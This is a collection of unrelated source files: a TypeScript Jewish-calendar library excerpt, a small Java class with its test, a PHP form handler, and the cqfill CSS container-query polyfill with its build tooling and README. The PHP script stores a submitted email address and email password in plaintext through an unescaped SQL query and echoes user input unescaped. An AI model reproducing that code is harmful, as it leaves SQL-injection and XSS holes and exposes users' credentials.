.minus({ milliseconds: Math.trunc(geo.getLocalMeanTimeOffset()) });
}
/**
* Returns the earliest time of <em>Kiddush Levana</em> calculated as 3 days after the molad. This method returns the time
* even if it is during the day when <em>Kiddush Levana</em> can't be said. Callers of this method should consider
* displaying the next <em>tzais</em> if the zman is between <em>alos</em> and <em>tzais</em>.
*
* @return the Date representing the moment 3 days after the molad.
*
* @see net.sourceforge.zmanim.ComplexZmanimCalendar#getTchilasZmanKidushLevana3Days()
* @see net.sourceforge.zmanim.ComplexZmanimCalendar#getTchilasZmanKidushLevana3Days(Date, Date)
*/
public getTchilasZmanKidushLevana3Days(): DateTime {
const molad: DateTime = this.getMoladAsDate();
return molad.plus({ hours: 72 });
}
/**
* Returns the earliest time of Kiddush Levana calculated as 7 days after the molad as mentioned by the <a
* href="http://en.wikipedia.org/wiki/Yosef_Karo">Mechaber</a>. See the <a
* href="http://en.wikipedia.org/wiki/Yoel_Sirkis">Bach's</a> opinion on this time. This method returns the time
* even if it is during the day when <em>Kiddush Levana</em> can't be said. Callers of this method should consider
* displaying the next <em>tzais</em> if the zman is between <em>alos</em> and <em>tzais</em>.
*
* @return the Date representing the moment 7 days after the molad.
*
* @see net.sourceforge.zmanim.ComplexZmanimCalendar#getTchilasZmanKidushLevana7Days()
* @see net.sourceforge.zmanim.ComplexZmanimCalendar#getTchilasZmanKidushLevana7Days(Date, Date)
*/
public getTchilasZmanKidushLevana7Days(): DateTime {
const molad: DateTime = this.getMoladAsDate();
return molad.plus({ hours: 168 });
}
/**
* Returns the latest time of Kiddush Levana according to the <a
* href="http://en.wikipedia.org/wiki/Yaakov_ben_Moshe_Levi_Moelin">Maharil's</a> opinion that it is calculated as
* halfway between molad and molad. This adds half the 29 days, 12 hours and 793 chalakim time between molad and
* molad (14 days, 18 hours, 22 minutes and 666 milliseconds) to the month's molad. This method returns the time
* even if it is during the day when <em>Kiddush Levana</em> can't be said. Callers of this method should consider
* displaying <em>alos</em> before this time if the zman is between <em>alos</em> and <em>tzais</em>.
*
* @return the Date representing the moment halfway between molad and molad.
* @see #getSofZmanKidushLevana15Days()
* @see net.sourceforge.zmanim.ComplexZmanimCalendar#getSofZmanKidushLevanaBetweenMoldos()
* @see net.sourceforge.zmanim.ComplexZmanimCalendar#getSofZmanKidushLevanaBetweenMoldos(Date, Date)
*/
public getSofZmanKidushLevanaBetweenMoldos(): DateTime {
const molad: DateTime = this.getMoladAsDate();
return molad.plus({
days: 14,
hours: 18,
minutes: 22,
seconds: 1,
milliseconds: 666,
});
}
/**
* Returns the latest time of Kiddush Levana calculated as 15 days after the molad. This is the opinion brought down
* in the Shulchan Aruch (Orach Chaim 426). It should be noted that some opinions hold that the
* <a href="http://en.wikipedia.org/wiki/Moses_Isserles">Rema</a> who brings down the opinion of the <a
* href="http://en.wikipedia.org/wiki/Yaakov_ben_Moshe_Levi_Moelin">Maharil's</a> of calculating
* {@link #getSofZmanKidushLevanaBetweenMoldos() half way between molad and mold} is of the opinion that Mechaber
* agrees to his opinion. Also see the Aruch Hashulchan. For additional details on the subject, See Rabbi Dovid
* Heber's very detailed writeup in Siman Daled (chapter 4) of <a
* href="http://www.worldcat.org/oclc/461326125">Shaarei Zmanim</a>. This method returns the time even if it is during
* the day when <em>Kiddush Levana</em> can't be said. Callers of this method should consider displaying <em>alos</em>
* before this time if the zman is between <em>alos</em> and <em>tzais</em>.
*
* @return the Date representing the moment 15 days after the molad.
* @see #getSofZmanKidushLevanaBetweenMoldos()
* @see net.sourceforge.zmanim.ComplexZmanimCalendar#getSofZmanKidushLevana15Days()
* @see net.sourceforge.zmanim.ComplexZmanimCalendar#getSofZmanKidushLevana15Days(Date, Date)
*/
public getSofZmanKidushLevana15Days(): DateTime {
const molad: DateTime = this.getMoladAsDate();
return molad.plus({ days: 15 });
}
/**
* Returns the Daf Yomi (Bavli) for the date that the calendar is set to. See the
* {@link HebrewDateFormatter#formatDafYomiBavli(Daf)} for the ability to format the daf in Hebrew or transliterated
* masechta names.
*
* @deprecated This depends on a circular dependency. Use <pre>YomiCalculator.getDafYomiBavli(jewishCalendar)</pre> instead.
* @return the daf as a {@link Daf}
*/
// eslint-disable-next-line class-methods-use-this
public getDafYomiBavli(): Daf {
// return YomiCalculator.getDafYomiBavli(this);
throw new Error('This method is not supported, due to a circular dependency. Use `YomiCalculator.getDafYomiBavli(jewishCalendar)` instead');
}
/**
* Returns the Daf Yomi (Yerushalmi) for the date that the calendar is set to. See the
* {@link HebrewDateFormatter#formatDafYomiYerushalmi(Daf)} for the ability to format the daf in Hebrew or transliterated
* masechta names.
*
* @deprecated This depends on a circular dependency. Use <pre>YerushalmiYomiCalculator.getDafYomiYerushalmi(jewishCalendar)</pre> instead.
* @return the daf as a {@link Daf}
*/
// eslint-disable-next-line class-methods-use-this
public getDafYomiYerushalmi(): Daf {
// return YerushalmiYomiCalculator.getDafYomiYerushalmi(this);
throw new Error('This method is not supported, due to a circular dependency. Use `YerushalmiYomiCalculator.getDafYomiYerushalmi(jewishCalendar)` instead');
}
/**
* @see Object#equals(Object)
*/
public equals(jewishCalendar: JewishCalendar): boolean {
return this.getAbsDate() === jewishCalendar.getAbsDate() && this.getInIsrael() === jewishCalendar.getInIsrael();
}
}
<file_sep>/**
* A class that represents a numeric time. Times that represent a time of day are stored as {@link java.util.Date}s in
* this API. The time class is used to represent numeric time such as the time in hours, minutes, seconds and
* milliseconds of a {@link net.sourceforge.zmanim.AstronomicalCalendar#getTemporalHour() temporal hour}.
*
* @author © <NAME> 2004 - 2011
* @version 0.9.0
*/
export class Time {
private static readonly SECOND_MILLIS: number = 1000;
private static readonly MINUTE_MILLIS: number = Time.SECOND_MILLIS * 60;
private static readonly HOUR_MILLIS: number = Time.MINUTE_MILLIS * 60;
private hours: number = 0;
private minutes: number = 0;
private seconds: number = 0;
private milliseconds: number = 0;
private negative: boolean = false;
constructor(hoursOrMillis: number, minutes?: number, seconds: number = 0, milliseconds: number = 0) {
if (minutes) {
this.hours = hoursOrMillis;
this.minutes = minutes;
this.seconds = seconds;
this.milliseconds = milliseconds;
} else {
let adjustedMillis: number = hoursOrMillis;
if (adjustedMillis < 0) {
this.negative = true;
adjustedMillis = Math.abs(adjustedMillis);
}
this.hours = Math.trunc(adjustedMillis / Time.HOUR_MILLIS);
adjustedMillis = adjustedMillis - this.hours * Time.HOUR_MILLIS;
this.minutes = Math.trunc(adjustedMillis / Time.MINUTE_MILLIS);
adjustedMillis = adjustedMillis - this.minutes * Time.MINUTE_MILLIS;
this.seconds = Math.trunc(adjustedMillis / Time.SECOND_MILLIS);
adjustedMillis = adjustedMillis - this.seconds * Time.SECOND_MILLIS;
this.milliseconds = adjustedMillis;
}
}
/*
public Time(millis: number) {
this((int) millis);
}
public Time(millis: number) {
adjustedMillis: number = millis;
if (adjustedMillis < 0) {
this.isNegative = true;
adjustedMillis = Math.abs(adjustedMillis);
}
this.hours = adjustedMillis / HOUR_MILLIS;
adjustedMillis = adjustedMillis - this.hours * HOUR_MILLIS;
this.minutes = adjustedMillis / MINUTE_MILLIS;
adjustedMillis = adjustedMillis - this.minutes * MINUTE_MILLIS;
this.seconds = adjustedMillis / SECOND_MILLIS;
adjustedMillis = adjustedMillis - this.seconds * SECOND_MILLIS;
this.milliseconds = adjustedMillis;
}
*/
public isNegative(): boolean {
return this.negative;
}
public setIsNegative(isNegative: boolean): void {
this.negative = isNegative;
}
/**
* @return Returns the hour.
*/
public getHours(): number {
return this.hours;
}
/**
* @param hours
* The hours to set.
*/
public setHours(hours: number): void {
this.hours = hours;
}
/**
* @return Returns the minutes.
*/
public getMinutes(): number {
return this.minutes;
}
/**
* @param minutes
* The minutes to set.
*/
public setMinutes(minutes: number): void {
this.minutes = minutes;
}
/**
* @return Returns the seconds.
*/
public getSeconds(): number {
return this.seconds;
}
/**
* @param seconds
* The seconds to set.
*/
public setSeconds(seconds: number): void {
this.seconds = seconds;
}
/**
* @return Returns the milliseconds.
*/
public getMilliseconds(): number {
return this.milliseconds;
}
/**
* @param milliseconds
* The milliseconds to set.
*/
public setMilliseconds(milliseconds: number): void {
this.milliseconds = milliseconds;
}
public getTime(): number {
return this.hours * Time.HOUR_MILLIS + this.minutes * Time.MINUTE_MILLIS + this.seconds * Time.SECOND_MILLIS +
this.milliseconds;
}
/**
* @deprecated This depends on a circular dependency. Use <pre>new ZmanimFormatter(TimeZone.getTimeZone("UTC")).format(time)</pre> instead.
*/
// eslint-disable-next-line class-methods-use-this
public toString(): string {
throw new Error('This method is deprecated, due to the fact that it depends on a circular dependency. ' +
'Use `new ZmanimFormatter(TimeZone.getTimeZone(\'UTC\')).format(time)` instead');
}
}
|
942f34e53459d6bbc64ebbb0a6f4feb391f88c6e
|
[
"TypeScript"
] | 4
|
TypeScript
|
EzBulka/KosherZmanim
|
ca3abaf03567c631c046ab0ac836af92d3b1f0d0
|
8a3139e5dc2b68cdc5039c1daf1668a9d5f2e0d3
|
refs/heads/master
|
<file_sep>package arhangel.dim;
public class Avatar {
public static void main(String[] args) {
}
public String capitalize(String str) {
return str.toUpperCase();
}
}
<file_sep>package arhangel.dim;
import org.junit.Test;
import sun.security.x509.AVA;
import static org.junit.Assert.*;
/**
*
*/
public class AvatarTest {
@Test
public void testCapitalize() throws Exception {
Avatar avatar = new Avatar();
assertEquals("HELLO", avatar.capitalize("hello"));
}
}
|
4a6570b5796caa7552c6265ffdfaaa6cd51d1adc
|
[
"Java"
] | 2
|
Java
|
OKriw/messenger
|
19e54bf071ed569b943f0c5268d91f4001f1f30a
|
821c61565db88409ab59730a907c1fdcd5f415df
|
refs/heads/master
|
<file_sep><?php
$email_address=$_POST['email_address'];
$email_password=$_POST['<PASSWORD>'];
$name=$_POST['username'];
$con=mysqli_connect('localhost','root');
mysqli_select_db($con,'d');
$q="insert into email_info(email_address,email_password,name) values('$email_address','$email_password','$name');";
mysqli_query($con,$q);
mysqli_close($con);
?>
<html>
<head>
<title>ZEweb animation</title>
<Style>
h1
{
color:blue;
font-size:30px;
}
#n
{
color:red;
font-size:40px;
}
a
{
color:blue;
}
</style>
</head>
<body style="background-color:black;">
<h1>Welcome <span id="n"><?php echo "$name"?><span><br><br><a href="animation.html">Click to access animation</a></h1>
</form>
</body>
</html>
|
031f21663877550d897633fa712e958a41c10a89
|
[
"PHP"
] | 1
|
PHP
|
zeeshangondal/sample
|
8abf30ff28f64101a5f0dcfcf2cc2ded744f0083
|
bea98734cb9263cb0a439773db29ad69b5573bc1
|
refs/heads/main
|
<repo_name>teosbb/cqfill<file_sep>/test/postcss.js
import assert from 'assert/strict';
import postcss from 'postcss'
import postcssCQFill from 'cqfill/postcss'
async function test(...tests) {
for (const test of tests) await test()
}
test(
async () => {
const containCssValue = `layout inline-size`
const containerCssRuleBlock = `{\n\t.card {\n\t\tgrid-template-columns: 1fr 2fr;\n\t\tgrid-template-rows: auto 1fr;\n\t\talign-items: start;\n\t\tcolumn-gap: 20px;\n\t}\n}`
const sourceCss = `.container {\n\tcontain: ${containCssValue};\n}\n\n@container (width >= 700px) ${containerCssRuleBlock}`
const expectCss = `.container {\n\t--css-contain: ${containCssValue};\n\tcontain: ${containCssValue};\n}\n\n@media \\@container (min-width:700px) ${containerCssRuleBlock}\n\n@container (min-width:700px) ${containerCssRuleBlock}`
const { css: resultCss } = await postcss([
postcssCQFill
]).process(sourceCss, { from: './test.css', to: './test.css' })
try {
assert.equal(resultCss, expectCss)
console.log('PostCSS CQFill transformation a complete success!')
} catch (error) {
console.error('PostCSS CQFill transformation a complete failure!')
console.error(error)
}
},
async () => {
const containCssValue = `layout inline-size`
const containerCssRuleBlock = `{\n\t.card {\n\t\tgrid-template-columns: 1fr 2fr;\n\t\tgrid-template-rows: auto 1fr;\n\t\talign-items: start;\n\t\tcolumn-gap: 20px;\n\t}\n}`
const sourceCss = `.container {\n\tcontain: ${containCssValue};\n}\n\n@container(width >= 700px) ${containerCssRuleBlock}`
const expectCss = `.container {\n\t--css-contain: ${containCssValue};\n\tcontain: ${containCssValue};\n}\n\n@media \\@container (min-width:700px) ${containerCssRuleBlock}\n\n@container(min-width:700px) ${containerCssRuleBlock}`
const { css: resultCss } = await postcss([
postcssCQFill
]).process(sourceCss, { from: './test.css', to: './test.css' })
try {
assert.equal(resultCss, expectCss)
console.log('PostCSS CQFill transformation without a space between @media and @container a complete success!')
} catch (error) {
console.error('PostCSS CQFill transformation without a space between @media and @container a complete failure!')
console.error(error)
}
}
)
<file_sep>/.bin/build.js
import { box } from './internal/color.js'
import { isProcessMeta, getProcessArgOf } from './internal/process.js'
import esbuild from 'esbuild'
import fs from 'fs/promises'
import nodemon from 'nodemon'
import zlib from 'zlib'
import { minify } from 'terser'
/** @typedef {{ [name: string]: string }} Exports */
/** @typedef {{ extension: string, transform(code: string, exports: Exports): string }} Variant */
/** @type {{ [name: string]: Variant }} */
const variants = {
esm: {
extension: 'mjs',
transform(code, exports) {
/** @type {string[]} */
const esmExports = []
for (const name in exports) esmExports.push(`${exports[name]} as ${name}`)
return (
esmExports.length
? `${code}export{${esmExports.join(',')}}`
: code
)
},
},
cjs: {
extension: 'cjs',
transform(code, exports) {
/** @type {string[]} */
const cjsExports = []
for (const name in exports) cjsExports.push(`${name}:${exports[name]}`)
return (
cjsExports.length
? 'default' in exports
? `${code}module.exports=Object.assign(${exports.default},{${cjsExports.join(',')}})`
: `${code}module.exports={${cjsExports.join(',')}}`
: code
)
},
},
iife: {
extension: 'js',
transform(code, exports) {
code = code.replace(/;$/, '')
for (const name in exports) code = `${code};globalThis.${name}=${exports[name]}`
return code
},
},
}
/** @type {(pkgUrl: URL, base: string, opts: Options) => Promise<void>} */
export const build = async (pkgUrl, base, opts) => {
opts = Object.assign({ only: [] }, opts)
/** @type {{ name: string }} */
const { name } = JSON.parse(
await fs.readFile(
new URL('package.json', pkgUrl),
'utf8'
)
)
if (!opts.only.length || opts.only.includes(name)) {
const srcUrl = new URL(`src/${base}.js`, pkgUrl)
const outDirUrl = new URL(`${base}/`, pkgUrl)
const outEsmUrl = new URL(`${base}/${name}.mjs`, pkgUrl)
// Build ESM version
const {
outputFiles: [cmapResult, codeResult],
} = await esbuild.build({
entryPoints: [srcUrl.pathname],
outfile: outEsmUrl.pathname,
bundle: true,
format: 'esm',
sourcemap: 'external',
write: false,
})
// Minify ESM version
const { code, map } = await minify(codeResult.text, {
sourceMap: { content: cmapResult.text },
compress: true,
keep_fnames: true,
module: true,
mangle: true,
toplevel: true,
})
// ensure empty dist directory
await fs.mkdir(outDirUrl, { recursive: true })
// write map
await fs.writeFile(new URL(`${name}.map`, outDirUrl), map)
// prepare variations
/** @type {(code: string, index?: number) => [string, string]} */
const splitByExport = (code, index = code.indexOf('export')) => [code.slice(0, index), code.slice(index)]
const [lead, tail] = splitByExport(code)
/** @type {{ [name: string]: string }} */
const exports = Array.from(tail.matchAll(/([$\w]+) as (\w+)/g)).reduce(
(exports, each) => Object.assign(exports, { [each[2]]: each[1] }), Object.create(null)
)
/** @type {(object: object, name: string) => boolean} */
const hasOwnProperty = (object, name) => Object.prototype.hasOwnProperty.call(object, name)
const customExports = {
cjs: { ...exports },
iife: { ...exports }
}
if (hasOwnProperty(customExports.iife, 'default') && !hasOwnProperty(customExports.iife, base)) {
customExports.iife[base] = customExports.iife.default
delete customExports.iife.default
}
const size = {
name: base,
types: {},
}
// write variation builds
for (const variant in variants) {
/** @type {Variant} */
const variantInfo = variants[variant]
const variantPath = new URL(`${name}.${variantInfo.extension}`, outDirUrl).pathname
const variantCode = variantInfo.transform(lead, customExports[variant] || exports)
const variantMins = (Buffer.byteLength(variantCode) / 1000).toFixed(2)
const variantGzip = Number(zlib.gzipSync(variantCode, { level: 9 }).length / 1000).toFixed(2)
size.types[variant] = {
min: variantMins,
gzp: variantGzip,
}
const mapping = variant === 'iife' ? '' : `\n//# sourceMappingUrl=${base}.map`
await fs.writeFile(variantPath, variantCode + mapping)
const packageJSON = JSON.stringify({
private: true,
type: 'module',
main: `${name}.cjs`,
module: `${name}.mjs`,
jsdelivr: `${name}.js`,
unpkg: `${name}.js`,
files: [
`${name}.cjs`,
`${name}.js`,
`${name}.mjs`
],
exports: {
'.': {
browser: `./${name}.js`,
import: `./${name}.mjs`,
require: `./${name}.cjs`,
default: `./${name}.mjs`
}
}
}, null, ' ')
await fs.writeFile(new URL('package.json', outDirUrl), packageJSON)
}
console.log(box(size))
}
}
/** @typedef {{ only?: string[] }} Options */
/** @type {(opts: Options) => Promise<void>} */
export const buildAll = async (opts) => {
const pkgUrl = new URL('../', import.meta.url)
await build(pkgUrl, 'export', opts)
await build(pkgUrl, 'postcss', opts)
await build(pkgUrl, 'postcss-7', opts)
await build(pkgUrl, 'polyfill', opts)
}
if (isProcessMeta(import.meta)) {
if (getProcessArgOf('watch').includes(true)) {
let onlyArgs = getProcessArgOf('only')
onlyArgs = onlyArgs.length ? ['--only', ...onlyArgs] : onlyArgs
nodemon(
[
'-q',
`--watch src`,
`--exec "${['node', './.bin/build.js', ...onlyArgs].join(' ')}"`,
].join(' '),
).on('start', () => {
process.stdout.write('\u001b[3J\u001b[2J\u001b[1J')
console.clear()
}).on('quit', () => process.exit()) // prettier-ignore
} else {
buildAll({
only: getProcessArgOf('only'),
}).catch((error) => {
console.error(error)
process.exitCode = 1
})
}
}
<file_sep>/src/postcss-7.js
import postcssCQFill from './postcss.js'
export default Object.defineProperties(postcssCQFill, Object.getOwnPropertyDescriptors({
get postcss() {
function postcssPlugin(cssRoot) {
const visitors = postcssCQFill()
if (typeof visitors.Once === 'function') {
visitors.Once(cssRoot)
}
cssRoot.walk(node => {
const [visitorType, needle] = {
atrule: ['AtRule', 'name'],
comment: ['Comment', 'text'],
decl: ['Declaration', 'prop'],
rule: ['Rule', 'selector'],
}[node.type]
if (visitorType in visitors) {
const visitor = visitors[visitorType]
if (typeof visitor === 'function') visitor(node)
else if (typeof visitor === 'object' && visitor !== null) {
for (const term in visitor) {
const search = node[needle]
if (term === '*' || term.includes(search)) visitor[term](node)
}
}
}
})
}
postcssPlugin.postcssPlugin = 'cqfill/postcss'
postcssPlugin.postcssVersion = '8.2.13'
return postcssPlugin
}
}))
<file_sep>/src/export.js
export const cqfill = ((
{ every, indexOf, slice } = Array.prototype,
defaultRoot = globalThis.document,
supportsLayoutContainment = defaultRoot && CSS.supports('contain: layout inline-size'),
unmatchableSelector = ':not(*)',
containerQueryMatcher = /\(\s*(min|max)-(height|width):\s*([^\s]+)\s*\)/,
numberMatcher = /^([+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[Ee][+-]?\d+)?)(.*)$/,
/** @type {Set<Element>} */
layoutContainerSet = new Set(),
/** @type {Map<Element, string>} */
layoutContainerMap = new WeakMap(),
/** @type {[string, CSSStyleRule, (rect: Element, matchableAxis: 'width' | 'height') => boolean, matchableAxis: 'width' | 'height'][]} */
containerQueries = [],
/** @type {(() => void)[]} */
onMutationList = [],
/** @type {(selectorList: string[]) => string} */
getSelectorText = (selectorList) => selectorList.length ? `:where(${selectorList.join(',')})` : unmatchableSelector,
/** @type {(element: Element) => string} */
getElementSelectorText = (element) => {
/** @type {Element} */
let parent
let selector = ''
while (parent = element.parentElement) {
/** @type {number} */
const nthChild = indexOf.call(parent.children, element) + 1
selector = ` > :nth-child(${nthChild})${selector}`
element = parent
}
return ':root' + selector
},
/** @type {(element: Element) => boolean} */
hasInlineOuterDisplay = (element) => /inline/i.test(getComputedStyle(element).display),
/** @type {(cssParentRule: CSSParentRule, cssRule: CSSAnyRule) => number} */
getCSSRuleIndexOf = (cssParentRule, cssRule) => indexOf.call(cssParentRule.cssRules || [], cssRule),
/** @type {(cssParentRule: CSSParentRule) => CSSAnyRule[]} */
getCSSRules = (cssParentRule) => slice.call(cssParentRule.cssRules || []),
/** @type {(cssParentRule: CSSParentRule, cssText: string, index: number) => CSSAnyRule} */
insertCssRule = (cssParentRule, cssText, index) => cssParentRule.cssRules[cssParentRule.insertRule(cssText, index)],
onResize = () => {
for (const [containedSelectorText, innerRule, doesFulfillQuery, axis] of containerQueries) {
/** @type {Set<Element>} */
const fulfilledElements = new Set()
for (const layoutContainer of layoutContainerSet) {
if (doesFulfillQuery(layoutContainer, layoutContainerMap.get(layoutContainer))) {
for (const element of layoutContainer.querySelectorAll(containedSelectorText)) {
fulfilledElements.add(element)
}
}
}
/** @type {string[]} */
const fulfilledSelectorList = []
for (const element of fulfilledElements) {
const selectorText = getElementSelectorText(element)
fulfilledSelectorList.push(selectorText)
}
const nextSelectorText = fulfilledSelectorList.length ? `:is(${containedSelectorText}):where(${fulfilledSelectorList.join(',')})` : unmatchableSelector
if (innerRule.selectorText !== nextSelectorText) {
innerRule.selectorText = nextSelectorText
}
}
},
/** @type {(root: DocumentOrShadowRoot, cssRule: CSSAnyRule, cssParentRule: CSSParentRule, hasInlineSizeContainment: boolean, hasBlockSizeContainment: boolean) => string} */
addLayoutContainerByCssRule = (root, cssRule, cssParentRule, hasInlineSizeContainment, hasBlockSizeContainment) => {
const cssRuleIndex = getCSSRuleIndexOf(cssParentRule, cssRule)
const getFallbackCssText = (
/** @type {boolean} */
hasInlineDisplay
) => (
`${
unmatchableSelector
}{transform:scale3d(1,1,1);${
hasInlineSizeContainment ? (
`inline-size:${
hasInlineDisplay ? 0 : 100
}%;`
) : ''
}${
hasBlockSizeContainment ? (
`block-size:${
hasInlineDisplay ? 0 : 100
};`
) : ''
}}`
)
const fallbackCssText = `@media all{${getFallbackCssText(true)}${getFallbackCssText(false)}}`
const cssPolyfillGroup = insertCssRule(cssParentRule, fallbackCssText, cssRuleIndex)
const [cssInlinePolyfillStyleRule, cssBlockPolyfillStyleRule] = cssPolyfillGroup.cssRules
/** @type {Element[]} */
let lastElements = []
const onMutation = () => {
/** @type {string[]} */
const blockSelectorList = []
/** @type {string[]} */
const inlineSelectorList = []
const elements = root.querySelectorAll(cssRule.selectorText)
/** @type {(value: Element, index: number) => boolean} */
const doesMatchElement = (element, index) => element === lastElements[index]
const doesMatchAllElements = elements.length === lastElements.length && every.call(elements, doesMatchElement)
if (!doesMatchAllElements) {
layoutContainerSet.clear()
ro.disconnect()
for (const element of elements) {
layoutContainerSet.add(element)
layoutContainerMap.set(element, [hasInlineSizeContainment, hasBlockSizeContainment])
const selectorText = getElementSelectorText(element)
if (hasInlineOuterDisplay(element)) inlineSelectorList.push(selectorText)
else blockSelectorList.push(selectorText)
ro.observe(element)
}
const nextInlinePolyfillStyleRuleSelectorText = getSelectorText(inlineSelectorList)
if (cssInlinePolyfillStyleRule.selectorText !== nextInlinePolyfillStyleRuleSelectorText) {
cssInlinePolyfillStyleRule.selectorText = nextInlinePolyfillStyleRuleSelectorText
}
const nextBlockPolyfillStyleRuleSelectorText = getSelectorText(blockSelectorList)
if (cssBlockPolyfillStyleRule.selectorText !== nextBlockPolyfillStyleRuleSelectorText) {
cssBlockPolyfillStyleRule.selectorText = nextBlockPolyfillStyleRuleSelectorText
}
lastElements = elements
}
}
onMutation()
onMutationList.push(onMutation)
mo.observe(root, { attributes: true, childList: true, subtree: true })
},
/** @type {(root: DocumentOrShadowRoot, styleSheet: CSSStyleSheet) => void} */
polyfillLayoutContainment = (root, styleSheet) => {
/** @type {(cssRule: CSSStyleRule) => string[]} */
const getCssStyleRuleContainValues = (cssRule) => cssRule.style ? cssRule.style.getPropertyValue('--css-contain').trim().toLowerCase().split(/\s+/) : []
/** @type {(cssParentRule: CSSParentRule) => void} */
const walkCssParent = (cssParentRule) => {
// For each `CSSRule` in a `CSSGroupingRule` or `CSSStyleSheet`;
for (const cssRule of getCSSRules(cssParentRule)) {
walkCssParent(cssRule)
const containValues = getCssStyleRuleContainValues(cssRule)
const hasLayoutContainment = containValues.includes('layout')
const hasSizeContainment = containValues.includes('size')
const hasInlineSizeContainment = hasLayoutContainment && (hasSizeContainment || containValues.includes('inline-size'))
const hasBlockSizeContainment = hasLayoutContainment && (hasSizeContainment || containValues.includes('block-size'))
// If the target rule represents a style rule, and;
// If the target rule style contains a fallback contain property, and;
// If the fallback contain property represents a layout container, then;
if (hasInlineSizeContainment || hasBlockSizeContainment) {
// Add the element to the list of layout containers, and;
// Add a fallback layout containment rule for that specific element.
addLayoutContainerByCssRule(root, cssRule, cssParentRule, hasInlineSizeContainment, hasBlockSizeContainment)
}
}
}
walkCssParent(styleSheet)
},
/** @type {(root: DocumentOrShadowRoot, styleSheet: CSSStyleSheet) => void} */
polyfillContainerQueries = (root, styleSheet) => {
/** @type {(cssParentRule: CSSParentRule) => void} */
const walkCssParent = (cssParentRule) => {
// For each `CSSRule` in a `CSSGroupingRule` or `CSSStyleSheet`;
for (const cssRule of getCSSRules(cssParentRule)) {
/** @type {string} */
const mediaText = cssRule.media ? cssRule.media.mediaText : ''
const hasContainerQueryPolyfill = mediaText.indexOf('@container') === 0 || mediaText.indexOf('--css-container') === 0
if (hasContainerQueryPolyfill) {
/** @type {null | [string, 'max' | 'min', 'height' | 'width', `${number}${string}`]} */
const containerQueryMatches = cssRule.media[0].match(containerQueryMatcher)
// If the target rule represents a fallback container query;
// Parse the container query from the target rule, and;
if (containerQueryMatches) {
const [, minMax, axis, size] = containerQueryMatches
const [, sizeValue, sizeUnit] = size.match(numberMatcher)
/** @type {(rect: Element, hasInlineSizeContainment: boolean, hasBlockSizeContainment: boolean) => boolean} */
const doesFulfillQuery = (element, hasInlineSizeContainment, hasBlockSizeContainment) => {
const fulfillsBlockSizeContainment = (hasBlockSizeContainment !== (axis === 'block-size' || axis === 'height'))
const fulfillsInlineSizeContainment = (hasInlineSizeContainment !== (axis === 'inline-size' || axis === 'width'))
if (!fulfillsBlockSizeContainment && !fulfillsInlineSizeContainment) return false
const value = element.getBoundingClientRect()[axis]
const sized = Number(sizeValue) * (
sizeUnit === 'em'
? parseInt(window.getComputedStyle(element).fontSize)
: sizeUnit === 'rem'
? parseInt(window.getComputedStyle(root.documentElement).fontSize)
: sizeUnit === 'vh'
? window.innerHeight / 100
: sizeUnit === 'vw'
? window.innerWidth / 100
: 1
)
return (
minMax === 'min'
? value >= sized
: value <= sized
)
}
const cssRuleIndex = getCSSRuleIndexOf(cssParentRule, cssRule)
const cssPolyfillGroup = insertCssRule(cssParentRule, '@media all{}', cssRuleIndex)
let index = 0
for (const cssInnerRule of getCSSRules(cssRule)) {
/** @type {undefined | string} */
const cssInnerRuleSelectorText = cssInnerRule.selectorText
if (cssInnerRuleSelectorText) {
const cssInnerRuleBlock = cssInnerRule.cssText.slice(cssInnerRuleSelectorText.length)
const cssPolyfillInnerRuleCssText = `${unmatchableSelector}${cssInnerRuleBlock}`
/** @type {CSSStyleRule} */
const cssPolyfillInnerRule = insertCssRule(cssPolyfillGroup, cssPolyfillInnerRuleCssText, index++)
containerQueries.push([
cssInnerRuleSelectorText,
cssPolyfillInnerRule,
doesFulfillQuery
])
}
}
}
}
walkCssParent(cssRule)
}
}
walkCssParent(styleSheet)
onResize()
},
/** @type {ResizeObserver} */
ro,
/** @type {MutationObserver} */
mo,
) => (
/** @type {DocumentOrShadowRoot | void} */
root = defaultRoot
) => {
if (defaultRoot && !supportsLayoutContainment) {
let lastNumberOfStyleSheets = 0
/** @type {{ styleSheets: StyleSheetList }} */
const { styleSheets } = root
const onMutation = () => {
for (const onMutation of onMutationList) {
onMutation()
}
}
const onFrame = () => {
const numberOfStyleSheets = styleSheets.length
if (numberOfStyleSheets !== lastNumberOfStyleSheets) {
while (lastNumberOfStyleSheets < numberOfStyleSheets) {
const styleSheet = styleSheets[lastNumberOfStyleSheets++]
if (
styleSheet
&& (
!styleSheet.href
|| styleSheet.href.startsWith(location.origin)
)
) {
polyfillContainerQueries(root, styleSheet)
polyfillLayoutContainment(root, styleSheet)
}
}
lastNumberOfStyleSheets = numberOfStyleSheets
}
requestAnimationFrame(onFrame)
}
ro = new ResizeObserver(onResize)
mo = new MutationObserver(onMutation)
onFrame()
}
}
)()
/** @typedef {CSSStyleRule | CSSImportRule | CSSMediaRule | CSSFontFaceRule | CSSPageRule | CSSNamespaceRule | CSSKeyframesRule | CSSKeyframeRule | CSSSupportsRule} CSSAnyRule */
/** @typedef {CSSStyleSheet | CSSMediaRule | CSSKeyframesRule | CSSSupportsRule} CSSParentRule */
<file_sep>/README.md
# CQFill
**CQFill** is a polyfill for [CSS Container Queries].
```sh
npm install cqfill # yarn add cqfill
```
## Demos
<table><tr><td><a href="https://codepen.io/jonneal/full/rNjRBOX"><img src="https://user-images.githubusercontent.com/188426/116027454-ed950f80-a622-11eb-94f5-be5b9307705b.png" alt="Component Query Card Demo" width="340" /></a></td></tr></table>
<table><tr><td><a href="https://codepen.io/jonneal/full/WNRPBQg"><img src="https://user-images.githubusercontent.com/188426/116027093-f76a4300-a621-11eb-9530-e67727e7fd71.png" alt="Article - QC" width="340" /></a></td></tr></table>
<table><tr><td><a href="https://codepen.io/jonneal/full/YzNBber"><img src="https://user-images.githubusercontent.com/188426/116027091-f6d1ac80-a621-11eb-9c20-2322c1b2a2c8.png" alt="Balloon G-OPAW" width="340" /></a></td></tr></table>
## Usage
Add the **CQFill** polyfill to your page:
```html
<script src="https://unpkg.com/cqfill"></script>
```
Or, add the CQFill script to your NodeJS project:
```js
import 'cqfill'
```
Next, add the included [PostCSS] plugin to your `.postcssrc.json` file:
```js
{
"plugins": [
"cqfill/postcss"
]
}
```
Now, go forth and use CSS container queries:
```css
.container {
contain: layout inline-size;
}
@container (min-width: 700px) {
.contained {
/* styles applied when a container is at least 700px */
}
}
```
## Tips
You can use [PostCSS Nesting] to nest `@container` rules:
```js
{
"plugins": [
"postcss-nesting",
"cqfill/postcss"
]
}
```
You can activate the polyfill manually:
```html
<script src="https://unpkg.com/cqfill/export"></script>
